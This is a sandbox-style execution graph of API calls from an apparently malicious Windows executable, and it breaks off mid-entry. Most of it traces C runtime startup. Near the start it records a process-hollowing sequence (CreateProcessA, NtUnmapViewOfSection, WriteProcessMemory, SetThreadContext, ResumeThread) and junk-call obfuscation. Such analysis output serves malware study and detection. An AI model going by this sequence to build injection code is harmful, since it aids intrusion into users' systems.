                                                                                                                                                              execution_graph 10889 42a378 10890 42a380 10889->10890 10891 42a3b9 GlobalFlags LocalFlags 10890->10891 10892 42a38c InterlockedIncrement GetCharWidthFloatA ClearEventLogA GlobalUnfix OpenWaitableTimerA 10890->10892 10893 42a3e3 10890->10893 10891->10890 10892->10891 10894 42a40c 13 API calls 10893->10894 10895 42a472 LoadLibraryW 10893->10895 10894->10893 10896 42a64b 10895->10896 10897 42a54f 20 API calls 10895->10897 10897->10896 10837 830000 10840 830630 10837->10840 10839 830005 10841 83064c 10840->10841 10843 831577 10841->10843 10846 8305b0 10843->10846 10849 8305dc 10846->10849 10847 8305e2 GetFileAttributesA 10847->10849 10848 83061e 10849->10847 10849->10848 10851 830420 10849->10851 10852 8304f3 10851->10852 10853 8304fa 10852->10853 10854 8304ff CreateWindowExA 10852->10854 10853->10849 10854->10853 10855 830540 PostMessageA 10854->10855 10856 83055f 10855->10856 10856->10853 10858 830110 VirtualAlloc GetModuleFileNameA 10856->10858 10859 830414 10858->10859 10860 83017d CreateProcessA 10858->10860 10859->10856 10860->10859 10862 83025f VirtualFree VirtualAlloc Wow64GetThreadContext 10860->10862 10862->10859 10863 8302a9 ReadProcessMemory 10862->10863 10864 8302e5 VirtualAllocEx NtWriteVirtualMemory 10863->10864 10865 8302d5 NtUnmapViewOfSection 10863->10865 10866 83033b 10864->10866 10865->10864 10867 830350 NtWriteVirtualMemory 10866->10867 10868 83039d WriteProcessMemory Wow64SetThreadContext ResumeThread 10866->10868 10867->10866 10869 8303fb ExitProcess 10868->10869 10871 957c5c 10874 957c64 10871->10874 10875 957c73 10874->10875 10878 958404 10875->10878 10881 95841f 10878->10881 10879 958428 CreateToolhelp32Snapshot 10880 958444 Module32First 10879->10880 10879->10881 10882 958453 10880->10882 10883 957c63 10880->10883 10881->10879 10881->10880 10885 9580c3 10882->10885 10886 9580ee 10885->10886 10887 9580ff VirtualAlloc 10886->10887 10888 958137 10886->10888 10887->10888 10888->10888 9552 408591 9590 40b850 9552->9590 9554 40859d GetStartupInfoW 9555 4085b1 HeapSetInformation 9554->9555 9558 4085bc 9554->9558 9555->9558 9557 40860a 9559 408615 9557->9559 9667 408568 9557->9667 9591 40ad4b HeapCreate 9558->9591 9592 40c349 GetModuleHandleW 9559->9592 9562 40861b 9563 408626 __RTC_Initialize 9562->9563 9564 408568 _fast_error_exit 62 API calls 9562->9564 9617 40b2ac GetStartupInfoW 9563->9617 9564->9563 9567 408640 GetCommandLineW 9630 40cc48 GetEnvironmentStringsW 9567->9630 9571 408650 9636 40cb9a GetModuleFileNameW 9571->9636 9573 40865a 9574 408665 9573->9574 9575 4083b6 __amsg_exit 62 API calls 9573->9575 9640 40c968 9574->9640 9575->9574 9578 408676 9654 408195 9578->9654 9580 4083b6 __amsg_exit 62 API calls 9580->9578 9581 40867e 9582 4083b6 __amsg_exit 62 API calls 9581->9582 9583 408689 __wwincmdln 9581->9583 9582->9583 9660 42a660 9583->9660 9586 4086b9 9685 408398 9586->9685 9589 4086be _doexit 9590->9554 9591->9557 9593 40c366 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 9592->9593 9594 40c35d 9592->9594 9597 40c3b0 TlsAlloc 9593->9597 9688 40c096 9594->9688 9599 40c3fe TlsSetValue 9597->9599 9600 40c4bf 9597->9600 9599->9600 9601 40c40f 9599->9601 9600->9562 9692 40813e 9601->9692 9606 40c457 DecodePointer 9609 40c46c 9606->9609 9607 40c4ba 9608 40c096 __mtterm TlsFree 9607->9608 9608->9600 9609->9607 9701 40a6ac 9609->9701 9612 40c48a DecodePointer 9613 40c49b 9612->9613 9613->9607 9614 40c49f 9613->9614 9707 40c0d3 9614->9707 9616 40c4a7 GetCurrentThreadId 9616->9600 9618 40a6ac __calloc_crt 62 API calls 9617->9618 9624 40b2ca 9618->9624 9619 40b475 GetStdHandle 9625 40b43f 9619->9625 9620 40b4d9 SetHandleCount 9629 408634 9620->9629 9621 40a6ac __calloc_crt 62 API calls 9621->9624 9622 40b487 GetFileType 9622->9625 9623 40b3bf 9623->9625 9626 40b3f6 InitializeCriticalSectionAndSpinCount 9623->9626 9627 40b3eb GetFileType 9623->9627 9624->9621 9624->9623 9624->9625 9624->9629 9625->9619 9625->9620 9625->9622 9628 40b4ad InitializeCriticalSectionAndSpinCount 9625->9628 9626->9623 9626->9629 9627->9623 9627->9626 9628->9625 9628->9629 9629->9567 9675 4083b6 9629->9675 9631 40cc59 9630->9631 9632 40cc5d 9630->9632 9631->9571 9633 40a667 __malloc_crt 62 API calls 9632->9633 9635 40cc7f _memmove 9633->9635 9634 40cc86 FreeEnvironmentStringsW 9634->9571 9635->9634 9637 40cbcf _wparse_cmdline 9636->9637 9638 40a667 __malloc_crt 62 API calls 9637->9638 9639 40cc12 _wparse_cmdline 9637->9639 9638->9639 9639->9573 9641 40c980 _wcslen 9640->9641 9644 40866b 9640->9644 9642 40a6ac __calloc_crt 62 API calls 9641->9642 9643 40c9a4 _wcslen 9642->9643 9643->9644 9645 40c9fa 9643->9645 9647 40a6ac __calloc_crt 62 API calls 9643->9647 9648 40ca20 9643->9648 9650 41277b __NMSG_WRITE 62 API calls 9643->9650 9651 40ca37 9643->9651 9644->9578 9644->9580 9646 407f5d _free 62 API calls 9645->9646 9646->9644 9647->9643 9649 407f5d _free 62 API calls 9648->9649 9649->9644 9650->9643 9652 40b7e2 __invoke_watson 10 API calls 9651->9652 9653 40ca43 9652->9653 9656 4081a3 __IsNonwritableInCurrentImage 9654->9656 9942 40c510 9656->9942 9657 4081c1 __initterm_e 9659 4081e2 __IsNonwritableInCurrentImage 9657->9659 9945 4091a2 9657->9945 9659->9581 9661 42b476 CharUpperW 9660->9661 9661->9661 9662 42b47d 9661->9662 10007 429c40 9662->10007 9665 42b9c3 GetTempPathA GetCurrentDirectoryW 9666 4086ab 9665->9666 9666->9586 9682 40836c 9666->9682 9668 408576 9667->9668 9669 40857b 9667->9669 9670 40af3e __FF_MSGBANNER 62 API calls 9668->9670 9671 40ad8f __NMSG_WRITE 62 API calls 9669->9671 9670->9669 9672 408583 9671->9672 9673 408114 _doexit 3 API calls 9672->9673 9674 40858d 9673->9674 9674->9559 9676 40af3e __FF_MSGBANNER 62 API calls 9675->9676 9677 4083c0 9676->9677 9678 40ad8f __NMSG_WRITE 62 API calls 9677->9678 9679 4083c8 9678->9679 9680 408382 _raise 62 API calls 9679->9680 9681 4083d3 9680->9681 9683 40822c _doexit 62 API calls 9682->9683 9684 40837d 9683->9684 9684->9586 9686 40822c _doexit 62 API calls 9685->9686 9687 4083a3 9686->9687 9687->9589 9689 40c0a0 9688->9689 9690 40c0c0 TlsFree 9689->9690 9691 40c0ce 9689->9691 9690->9691 9691->9691 9720 40c050 EncodePointer 9692->9720 9694 408146 __init_pointers __initp_misc_winsig 9721 40bc70 EncodePointer 9694->9721 9696 40816c EncodePointer EncodePointer EncodePointer EncodePointer 9697 40ba3f 9696->9697 9698 40ba4a 9697->9698 9699 40ba54 InitializeCriticalSectionAndSpinCount 9698->9699 9700 40ba77 9698->9700 9699->9698 9699->9700 9700->9606 9700->9607 9704 40a6b5 9701->9704 9703 40a6f2 9703->9607 9703->9612 9704->9703 9705 40a6d3 Sleep 9704->9705 9722 411a54 9704->9722 9706 40a6e8 9705->9706 9706->9703 9706->9704 9755 40b850 9707->9755 9709 40c0df GetModuleHandleW 9756 40bbb9 9709->9756 9711 40c11d InterlockedIncrement 9763 40c175 9711->9763 9714 40bbb9 __lock 60 API calls 9715 40c13e 9714->9715 9766 40ef10 InterlockedIncrement 9715->9766 9717 40c15c 9778 40c17e 9717->9778 9719 40c169 _doexit 9719->9616 9720->9694 9721->9696 9723 411a60 9722->9723 9724 411a7b _malloc 9722->9724 9723->9724 9725 411a6c 9723->9725 9727 411a8e RtlAllocateHeap 9724->9727 9729 411ab5 9724->9729 9730 40a8ef 9725->9730 9727->9724 9727->9729 9729->9704 9733 40c187 GetLastError 9730->9733 9732 40a8f4 9732->9704 9745 40c062 TlsGetValue 9733->9745 9736 40c1f4 SetLastError 9736->9732 9737 40a6ac __calloc_crt 59 API calls 9738 40c1b2 9737->9738 9738->9736 9739 40c1d3 9738->9739 9740 40c1eb 9738->9740 9742 40c0d3 __initptd 59 API calls 9739->9742 9749 407f5d 9740->9749 9744 40c1db GetCurrentThreadId 9742->9744 9743 40c1f1 9743->9736 9744->9736 9746 40c092 9745->9746 9747 40c077 TlsSetValue 9745->9747 9746->9736 9746->9737 9747->9746 9750 407f68 HeapFree 9749->9750 9754 407f91 _free 9749->9754 9751 407f7d 9750->9751 9750->9754 9752 40a8ef __cftog_l 60 API calls 9751->9752 9753 407f83 GetLastError 9752->9753 9753->9754 9754->9743 9755->9709 9757 40bbe1 EnterCriticalSection 9756->9757 9758 40bbce 9756->9758 9757->9711 9781 40baf7 9758->9781 9760 40bbd4 9760->9757 9761 4083b6 __amsg_exit 61 API calls 9760->9761 9762 40bbe0 9761->9762 9762->9757 9940 40bae0 LeaveCriticalSection 9763->9940 9765 40c137 9765->9714 9767 40ef31 9766->9767 9768 40ef2e InterlockedIncrement 9766->9768 9769 40ef3b InterlockedIncrement 9767->9769 9770 40ef3e 9767->9770 9768->9767 9769->9770 9771 40ef48 InterlockedIncrement 9770->9771 9772 40ef4b 9770->9772 9771->9772 9773 40ef55 InterlockedIncrement 9772->9773 9775 40ef58 9772->9775 9773->9775 9774 40ef71 InterlockedIncrement 9774->9775 9775->9774 9776 40ef81 InterlockedIncrement 9775->9776 9777 40ef8c InterlockedIncrement 9775->9777 9776->9775 9777->9717 9941 40bae0 LeaveCriticalSection 9778->9941 9780 40c185 9780->9719 9782 40bb03 _doexit 9781->9782 9783 40bb29 9782->9783 9806 40af3e 9782->9806 9792 40bb39 _doexit 9783->9792 9842 40a667 9783->9842 9790 40bb5a 9795 40bbb9 __lock 61 API calls 9790->9795 9791 40bb4b 9794 40a8ef __cftog_l 61 API calls 9791->9794 9792->9760 9794->9792 9796 40bb61 9795->9796 9797 40bb94 9796->9797 9798 40bb69 InitializeCriticalSectionAndSpinCount 9796->9798 9801 407f5d _free 61 API calls 9797->9801 9799 40bb85 9798->9799 9800 40bb79 9798->9800 9848 40bbb0 9799->9848 9802 407f5d _free 61 API calls 9800->9802 9801->9799 9803 40bb7f 9802->9803 9805 40a8ef __cftog_l 61 API calls 9803->9805 9805->9799 9851 4127de 9806->9851 9808 40af45 9810 4127de __NMSG_WRITE 62 API calls 9808->9810 9812 40af52 9808->9812 9809 40ad8f __NMSG_WRITE 62 API calls 9811 40af6a 9809->9811 9810->9812 9813 40ad8f __NMSG_WRITE 62 API calls 9811->9813 9812->9809 9814 40af74 9812->9814 9813->9814 9815 40ad8f 9814->9815 9816 40adb0 __NMSG_WRITE 9815->9816 9818 4127de __NMSG_WRITE 59 API calls 9816->9818 9838 40aecc 9816->9838 9820 40adca 9818->9820 9819 40af3c 9839 408114 9819->9839 9821 40aedb GetStdHandle 9820->9821 9822 4127de __NMSG_WRITE 59 API calls 9820->9822 9825 40aee9 __setlocale_set_cat 9821->9825 9821->9838 9823 40addb 9822->9823 9823->9821 9824 40aded 9823->9824 9824->9838 9876 41277b 9824->9876 9827 40af1f WriteFile 9825->9827 9825->9838 9827->9838 9829 40ae19 GetModuleFileNameW 9830 40ae3a 9829->9830 9834 40ae46 _wcslen 9829->9834 9831 41277b __NMSG_WRITE 59 API calls 9830->9831 9831->9834 9832 40b7e2 __invoke_watson 10 API calls 9832->9834 9833 41261e 59 API calls __NMSG_WRITE 9833->9834 9834->9832 9834->9833 9836 40aebc 9834->9836 9885 412693 9834->9885 9894 4124b2 9836->9894 9912 408f61 9838->9912 9922 4080e9 GetModuleHandleW 9839->9922 9844 40a670 9842->9844 9845 40a6a6 9844->9845 9846 40a687 Sleep 9844->9846 9925 407f97 9844->9925 9845->9790 9845->9791 9847 40a69c 9846->9847 9847->9844 9847->9845 9939 40bae0 LeaveCriticalSection 9848->9939 9850 40bbb7 9850->9792 9852 4127ea 9851->9852 9853 4127f4 9852->9853 9854 40a8ef __cftog_l 62 API calls 9852->9854 9853->9808 9855 41280d 9854->9855 9858 40b834 9855->9858 9861 40b807 9858->9861 9862 40b818 9861->9862 9867 40b7e2 9862->9867 9864 40b833 9865 40b807 __cftog_l 10 API calls 9864->9865 9866 40b840 9865->9866 9866->9808 9870 40b6b9 9867->9870 9871 40b6d8 _memset __call_reportfault 9870->9871 9872 40b6f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9871->9872 9873 40b7c4 __call_reportfault 9872->9873 9874 408f61 __cftog_l 5 API calls 9873->9874 9875 40b7e0 GetCurrentProcess TerminateProcess 9874->9875 9875->9864 9877 412790 9876->9877 9878 412789 9876->9878 9879 40a8ef __cftog_l 62 API calls 9877->9879 9878->9877 9880 4127b1 9878->9880 9884 412795 9879->9884 9882 40ae0e 9880->9882 9883 40a8ef __cftog_l 62 API calls 9880->9883 9881 40b834 __cftog_l 10 API calls 9881->9882 9882->9829 9882->9834 9883->9884 9884->9881 9890 4126a5 9885->9890 9886 4126a9 9887 40a8ef __cftog_l 62 API calls 9886->9887 9888 4126ae 9886->9888 9889 4126c5 9887->9889 9888->9834 9891 40b834 __cftog_l 10 API calls 9889->9891 9890->9886 9890->9888 9892 4126ec 9890->9892 9891->9888 9892->9888 9893 40a8ef __cftog_l 62 API calls 9892->9893 9893->9889 9920 40c050 EncodePointer 9894->9920 9896 4124d8 9897 412565 9896->9897 9898 4124e8 LoadLibraryW 9896->9898 9903 41257f DecodePointer DecodePointer 9897->9903 9910 412592 9897->9910 9899 4124fd GetProcAddress 9898->9899 9906 4125fd 9898->9906 9902 412513 7 API calls 9899->9902 9899->9906 9900 4125f1 DecodePointer 9900->9906 9901 4125c8 DecodePointer 9901->9900 9904 4125cf 9901->9904 9902->9897 9905 412555 GetProcAddress EncodePointer 9902->9905 9903->9910 9904->9900 9909 4125e2 DecodePointer 9904->9909 9905->9897 9907 408f61 __cftog_l 5 API calls 9906->9907 9908 41261c 9907->9908 9908->9838 9909->9900 9911 4125b5 9909->9911 9910->9900 9910->9901 9910->9911 9911->9900 9913 408f69 9912->9913 9914 408f6b IsDebuggerPresent 9912->9914 9913->9819 9921 413318 9914->9921 9917 40db39 SetUnhandledExceptionFilter UnhandledExceptionFilter 9918 40db56 __call_reportfault 9917->9918 9919 40db5e GetCurrentProcess TerminateProcess 9917->9919 9918->9919 9919->9819 9920->9896 9921->9917 9923 40810d ExitProcess 9922->9923 9924 4080fd GetProcAddress 9922->9924 9924->9923 9926 408014 _malloc 9925->9926 9928 407fa5 _malloc 9925->9928 9929 40a8ef __cftog_l 61 API calls 9926->9929 9927 407fb0 9927->9928 9930 40af3e __FF_MSGBANNER 61 API calls 9927->9930 9933 40ad8f __NMSG_WRITE 61 API calls 9927->9933 9935 408114 _doexit 3 API calls 9927->9935 9928->9927 9931 407fd3 RtlAllocateHeap 9928->9931 9934 408000 9928->9934 9937 407ffe 9928->9937 9932 40800c 9929->9932 9930->9927 9931->9928 9931->9932 9932->9844 9933->9927 9936 40a8ef __cftog_l 61 API calls 9934->9936 9935->9927 9936->9937 9938 40a8ef __cftog_l 61 API calls 9937->9938 9938->9932 9939->9850 9940->9765 9941->9780 9943 40c516 EncodePointer 9942->9943 9943->9943 9944 40c530 9943->9944 9944->9657 9948 409166 9945->9948 9947 4091af 9947->9659 9949 409172 _doexit 9948->9949 9956 40812c 9949->9956 9955 409193 _doexit 9955->9947 9957 40bbb9 __lock 62 API calls 9956->9957 9958 408133 9957->9958 9959 40907f DecodePointer DecodePointer 9958->9959 9960 4090ad 9959->9960 9961 40912e 9959->9961 9960->9961 9973 40dc33 9960->9973 9970 40919c 9961->9970 9963 409111 EncodePointer EncodePointer 9963->9961 9964 4090e3 9964->9961 9967 40a6f8 __realloc_crt 66 API calls 9964->9967 9968 4090ff EncodePointer 9964->9968 9965 4090bf 9965->9963 9965->9964 9980 40a6f8 9965->9980 9969 4090f9 9967->9969 9968->9963 9969->9961 9969->9968 10003 408135 9970->10003 9974 40dc53 HeapSize 9973->9974 9975 40dc3e 9973->9975 9974->9965 9976 40a8ef __cftog_l 62 API calls 9975->9976 9977 40dc43 9976->9977 9978 40b834 __cftog_l 10 API calls 9977->9978 9979 40dc4e 9978->9979 9979->9965 9983 40a701 9980->9983 9982 40a740 9982->9964 9983->9982 9984 40a721 Sleep 9983->9984 9985 4083ea 9983->9985 9984->9983 9986 408400 9985->9986 9987 4083f5 9985->9987 9989 408408 9986->9989 9995 408415 _malloc 9986->9995 9988 407f97 _malloc 62 API calls 9987->9988 9990 4083fd 9988->9990 9991 407f5d _free 62 API calls 9989->9991 9990->9983 10002 408410 _free 9991->10002 9992 40844d _malloc 9996 40a8ef __cftog_l 62 API calls 9992->9996 9993 40841d HeapReAlloc 9993->9995 9993->10002 9994 40847d 9997 40a8ef __cftog_l 62 API calls 9994->9997 9995->9992 9995->9993 9995->9994 9999 408465 9995->9999 9996->10002 9998 408482 GetLastError 9997->9998 9998->10002 10000 40a8ef __cftog_l 62 API calls 9999->10000 10001 40846a GetLastError 10000->10001 10001->10002 10002->9983 10006 40bae0 LeaveCriticalSection 10003->10006 10005 40813c 10005->9955 10006->10005 10010 429c50 __write_nolock 10007->10010 10008 429c6a CharToOemBuffA 10008->10010 10009 429c7b AddConsoleAliasW 10009->10010 10010->10008 10010->10009 10011 429caa 10010->10011 10012 429cba GetAltTabInfoA DrawCaption WinHttpGetProxyForUrl 10011->10012 10015 429d4d 10011->10015 10013 429d06 DragAcceptFiles CoGetInstanceFromFile 10012->10013 10014 429cea SetThreadContext GetFileAttributesExA 10012->10014 10057 407c91 MoveFileA 10013->10057 10014->10013 10017 429d81 GetConsoleAliasesLengthW WriteConsoleOutputCharacterA EnumDateFormatsExW FindNextVolumeMountPointA 10015->10017 10019 429dbf GlobalAlloc 10015->10019 10017->10015 10018 429d27 10063 40802b 10018->10063 10021 429de0 10019->10021 10022 429e99 10019->10022 10028 429df7 GetWindowsDirectoryW SetThreadIdealProcessor ReadConsoleOutputCharacterW FatalAppExitW BuildCommDCBAndTimeoutsA 10021->10028 10029 429e55 10021->10029 10024 429ea2 32 API calls 10022->10024 10025 42a02a 10022->10025 10023 429d2d 10080 4176c4 10023->10080 10031 42a049 GetPrivateProfileStringA 10025->10031 10034 42a07c 48 API calls 10025->10034 10037 42a2f5 10025->10037 10027 429d37 10095 405ff0 10027->10095 10028->10029 10029->10021 10029->10022 10035 429e64 GetVolumeInformationW GetConsoleAliasA SetProcessShutdownParameters 10029->10035 10107 429720 10029->10107 10031->10025 10034->10025 10035->10029 10038 42a321 AddAtomW GetSystemWindowsDirectoryW DisconnectNamedPipe GetConsoleMode 10037->10038 10039 42a349 VirtualProtect 10037->10039 10038->10037 10049 429a30 10039->10049 10041 42a3b9 GlobalFlags LocalFlags 10043 42a368 10041->10043 10042 42a38c InterlockedIncrement GetCharWidthFloatA ClearEventLogA GlobalUnfix OpenWaitableTimerA 10042->10041 10043->10041 10043->10042 10044 42a3e3 10043->10044 10045 42a40c 13 API calls 10044->10045 10046 42a472 LoadLibraryW 10044->10046 10045->10044 10047 42a64b 10046->10047 10048 42a54f 20 API calls 10046->10048 10047->9665 10047->9666 10048->10047 10050 429c2f 10049->10050 10054 429a52 10049->10054 10050->10043 10051 429a6f WriteConsoleInputW 10051->10054 10052 429b48 WriteConsoleInputW 10052->10054 10053 429b88 GlobalGetAtomNameA FindNextFileA 10053->10054 10054->10050 10054->10051 10054->10052 10054->10053 10055 429bde GetCommandLineA 10054->10055 10056 429bfe MoveFileWithProgressW FindFirstFileW 10054->10056 10055->10054 10056->10054 10058 407ca6 GetLastError 10057->10058 10059 407cae 10057->10059 10058->10059 10060 407cc0 10059->10060 10110 40a915 10059->10110 10060->10018 10064 408037 _doexit 10063->10064 10065 408047 10064->10065 10066 40805d 10064->10066 10067 40a8ef __cftog_l 62 API calls 10065->10067 10118 40b684 10066->10118 10069 40804c 10067->10069 10072 40b834 __cftog_l 10 API calls 10069->10072 10070 408066 10125 40b085 10070->10125 10075 408057 _doexit 10072->10075 10075->10023 10078 4080c2 10162 4080df 10078->10162 10081 4176d0 _doexit 10080->10081 10082 4176e8 10081->10082 10083 4176fd 10081->10083 10085 40a8ef __cftog_l 62 API calls 10082->10085 10084 40b085 __lock_file 63 API calls 10083->10084 10089 417706 10084->10089 10086 4176ed 10085->10086 10087 40b834 __cftog_l 10 API calls 10086->10087 10093 4176f8 _doexit 10087->10093 10088 417736 10373 41776c 10088->10373 10089->10088 10352 417794 10089->10352 10092 41773c 10380 417764 10092->10380 10093->10027 10415 405b70 10095->10415 10097 40604d 10425 406980 10097->10425 10100 40607f 10448 406890 10100->10448 10104 408382 10807 40822c 10104->10807 10106 408393 10106->10015 10108 429733 9 API calls 10107->10108 10109 4297b9 10107->10109 10108->10109 10109->10029 10115 40a902 10110->10115 10112 40a920 _free 10113 40a8ef __cftog_l 62 API calls 10112->10113 10114 407cba 10113->10114 10114->10018 10116 40c187 __getptd_noexit 62 API calls 10115->10116 10117 40a907 10116->10117 10117->10112 10119 40b690 10118->10119 10120 40b6a5 10118->10120 10121 40a8ef __cftog_l 62 API calls 10119->10121 10120->10070 10122 40b695 10121->10122 10123 40b834 __cftog_l 10 API calls 10122->10123 10124 40b6a0 10123->10124 10124->10070 10126 40b097 10125->10126 10127 40b0b9 EnterCriticalSection 10125->10127 10126->10127 10128 40b09f 10126->10128 10129 40806e 10127->10129 10130 40bbb9 __lock 62 API calls 10128->10130 10131 40b4f1 10129->10131 10130->10129 10132 40b50a 10131->10132 10136 408079 10131->10136 10133 40b684 __flush 62 API calls 10132->10133 10132->10136 10134 40b525 10133->10134 10165 41316b 10134->10165 10137 40b1d8 10136->10137 10138 40b1e4 _doexit 10137->10138 10139 40b207 10138->10139 10140 40b1ec 10138->10140 10141 40b213 10139->10141 10146 40b24d 10139->10146 10142 40a902 __commit 62 API calls 10140->10142 10143 40a902 __commit 62 API calls 10141->10143 10144 40b1f1 10142->10144 10145 40b218 10143->10145 10147 40a8ef __cftog_l 62 API calls 10144->10147 10148 40a8ef __cftog_l 62 API calls 10145->10148 10149 4129a8 ___lock_fhandle 64 API calls 10146->10149 10150 40b1f9 _doexit 10147->10150 10151 40b220 10148->10151 10152 40b253 10149->10152 10150->10078 10153 40b834 __cftog_l 10 API calls 10151->10153 10154 40b261 10152->10154 10155 40b275 10152->10155 10153->10150 10331 40b163 10154->10331 10156 40a8ef __cftog_l 62 API calls 10155->10156 10158 40b27a 10156->10158 10160 40a902 __commit 62 API calls 10158->10160 10159 40b26d 10341 40b2a4 10159->10341 10160->10159 10345 40b0f8 10162->10345 10164 4080e7 10164->10075 10166 413177 _doexit 10165->10166 10167 41319a 10166->10167 10168 41317f 10166->10168 10170 4131a6 10167->10170 10173 4131e0 10167->10173 10169 40a902 __commit 62 API calls 10168->10169 10171 413184 10169->10171 10172 40a902 __commit 62 API calls 10170->10172 10174 40a8ef __cftog_l 62 API calls 10171->10174 10175 4131ab 10172->10175 10190 4129a8 10173->10190 10177 41318c _doexit 10174->10177 10178 40a8ef __cftog_l 62 API calls 10175->10178 10177->10136 10179 4131b3 10178->10179 10181 40b834 __cftog_l 10 API calls 10179->10181 10180 4131e6 10182 4131f4 10180->10182 10183 413208 10180->10183 10181->10177 10200 412a6e 10182->10200 10185 40a8ef __cftog_l 62 API calls 10183->10185 10186 41320d 10185->10186 10188 40a902 __commit 62 API calls 10186->10188 10187 413200 10259 413237 10187->10259 10188->10187 10191 4129b4 _doexit 10190->10191 10192 412a0e 10191->10192 10193 40bbb9 __lock 62 API calls 10191->10193 10194 412a13 EnterCriticalSection 10192->10194 10196 412a30 _doexit 10192->10196 10195 4129e0 10193->10195 10194->10196 10197 4129fc 10195->10197 10198 4129e9 InitializeCriticalSectionAndSpinCount 10195->10198 10196->10180 10262 412a3e 10197->10262 10198->10197 10201 412a7d __write_nolock 10200->10201 10202 412ab3 10201->10202 10203 412ad2 10201->10203 10233 412aa8 10201->10233 10205 40a902 __commit 62 API calls 10202->10205 10207 412b11 10203->10207 10210 412b2e 10203->10210 10204 408f61 __cftog_l 5 API calls 10206 413169 10204->10206 10208 412ab8 10205->10208 10206->10187 10209 40a902 __commit 62 API calls 10207->10209 10212 40a8ef __cftog_l 62 API calls 10208->10212 10214 412b16 10209->10214 10211 412b41 10210->10211 10266 414924 10210->10266 10276 4148ce 10211->10276 10216 412abf 10212->10216 10218 40a8ef __cftog_l 62 API calls 10214->10218 10219 40b834 __cftog_l 10 API calls 10216->10219 10217 412b4a 10220 412dec 10217->10220 10285 40c200 10217->10285 10221 412b1e 10218->10221 10219->10233 10223 412dfb 10220->10223 10224 41309c WriteFile 10220->10224 10222 40b834 __cftog_l 10 API calls 10221->10222 10222->10233 10226 412eb6 10223->10226 10234 412e0e 10223->10234 10228 412dce 10224->10228 10229 4130cf GetLastError 10224->10229 10239 412ec3 10226->10239 10248 412f90 10226->10248 10230 41311a 10228->10230 10228->10233 10237 4130ed 10228->10237 10229->10228 10230->10233 10236 40a8ef __cftog_l 62 API calls 10230->10236 10231 412b8e 10231->10220 10232 412b9e GetConsoleCP 10231->10232 10232->10228 10256 412bc1 10232->10256 10233->10204 10234->10228 10234->10230 10235 412e58 WriteFile 10234->10235 10235->10229 10235->10234 10240 41313d 10236->10240 10242 4130f8 10237->10242 10243 41310c 10237->10243 10238 412f32 WriteFile 10238->10229 10238->10239 10239->10228 10239->10230 10239->10238 10245 40a902 __commit 62 API calls 10240->10245 10241 413001 WideCharToMultiByte 10241->10229 10247 413038 WriteFile 10241->10247 10246 40a8ef __cftog_l 62 API calls 10242->10246 10244 40a915 __dosmaperr 62 API calls 10243->10244 10244->10233 10245->10233 10250 4130fd 10246->10250 10247->10248 10249 41306f GetLastError 10247->10249 10248->10228 10248->10230 10248->10241 10248->10247 10249->10248 10252 40a902 __commit 62 API calls 10250->10252 10252->10233 10253 412c6d WideCharToMultiByte 10253->10228 10255 412c9e WriteFile 10253->10255 10254 4148b4 72 API calls __fassign 10254->10256 10255->10229 10255->10256 10256->10228 10256->10229 10256->10253 10256->10254 10257 41475c WriteConsoleW CreateFileW __write_nolock 10256->10257 10258 412cf2 WriteFile 10256->10258 10290 413b73 10256->10290 10257->10256 10258->10229 10258->10256 10330 412a47 LeaveCriticalSection 10259->10330 10261 41323d 10261->10177 10265 40bae0 LeaveCriticalSection 10262->10265 10264 412a45 10264->10192 10265->10264 10293 41293f 10266->10293 10268 414942 10269 41495b SetFilePointer 10268->10269 10270 41494a 10268->10270 10272 414973 GetLastError 10269->10272 10273 41494f 10269->10273 10271 40a8ef __cftog_l 62 API calls 10270->10271 10271->10273 10272->10273 10274 41497d 10272->10274 10273->10211 10275 40a915 __dosmaperr 62 API calls 10274->10275 10275->10273 10277 4148db 10276->10277 10279 4148ea 10276->10279 10278 40a8ef __cftog_l 62 API calls 10277->10278 10280 4148e0 10278->10280 10281 414908 10279->10281 10282 40a8ef __cftog_l 62 API calls 10279->10282 10280->10217 10281->10217 10283 4148fb 10282->10283 10284 40b834 __cftog_l 10 API calls 10283->10284 10284->10280 10286 40c187 __getptd_noexit 62 API calls 10285->10286 10287 40c208 10286->10287 10288 40c215 GetConsoleMode 10287->10288 10289 4083b6 __amsg_exit 62 API calls 10287->10289 10288->10220 10288->10231 10289->10288 10306 413b3b 10290->10306 10294 41294c 10293->10294 10296 412964 10293->10296 10295 40a902 __commit 62 API calls 10294->10295 10298 412951 10295->10298 10297 40a902 __commit 62 API calls 10296->10297 10300 4129a3 10296->10300 10299 412975 10297->10299 10301 40a8ef __cftog_l 62 API calls 10298->10301 10302 40a8ef __cftog_l 62 API calls 10299->10302 10300->10268 10303 412959 10301->10303 10304 41297d 10302->10304 10303->10268 10305 40b834 __cftog_l 10 API calls 10304->10305 10305->10303 10309 409e1a 10306->10309 10308 413b4e 10308->10256 10310 409e2d 10309->10310 10314 409e5a 10309->10314 10311 40c200 __getptd 62 API calls 10310->10311 10312 409e32 10311->10312 10312->10314 10315 40f1d0 10312->10315 10314->10308 10316 40f1dc _doexit 10315->10316 10317 40c200 __getptd 62 API calls 10316->10317 10318 40f1e1 10317->10318 10319 40f20f 10318->10319 10321 40f1f3 10318->10321 10320 40bbb9 __lock 62 API calls 10319->10320 10322 40f216 10320->10322 10323 40c200 __getptd 62 API calls 10321->10323 10324 40f183 __updatetlocinfoEx_nolock 70 API calls 10322->10324 10325 40f1f8 10323->10325 10326 40f22a 10324->10326 10328 40f206 _doexit 10325->10328 10329 4083b6 __amsg_exit 62 API calls 10325->10329 10327 40f23d _LocaleUpdate::_LocaleUpdate LeaveCriticalSection 10326->10327 10327->10325 10328->10314 10329->10328 10330->10261 10332 41293f __lseek_nolock 62 API calls 10331->10332 10333 40b172 10332->10333 10334 40b188 SetFilePointer 10333->10334 10335 40b178 10333->10335 10337 40b1a7 10334->10337 10338 40b19f GetLastError 10334->10338 10336 40a8ef __cftog_l 62 API calls 10335->10336 10339 40b17d 10336->10339 10337->10339 10340 40a915 __dosmaperr 62 API calls 10337->10340 10338->10337 10339->10159 10340->10339 10344 412a47 LeaveCriticalSection 10341->10344 10343 40b2aa 10343->10150 10344->10343 10346 40b128 LeaveCriticalSection 10345->10346 10347 40b109 10345->10347 10346->10164 10347->10346 10348 40b110 10347->10348 10351 40bae0 LeaveCriticalSection 10348->10351 10350 40b125 10350->10164 10351->10350 10353 40b684 __flush 62 API calls 10352->10353 10354 4177a4 10353->10354 10355 4177c6 10354->10355 10356 4177af 10354->10356 10358 4177ca 10355->10358 10366 4177d7 __flsbuf 10355->10366 10357 40a8ef __cftog_l 62 API calls 10356->10357 10365 4177b4 10357->10365 10359 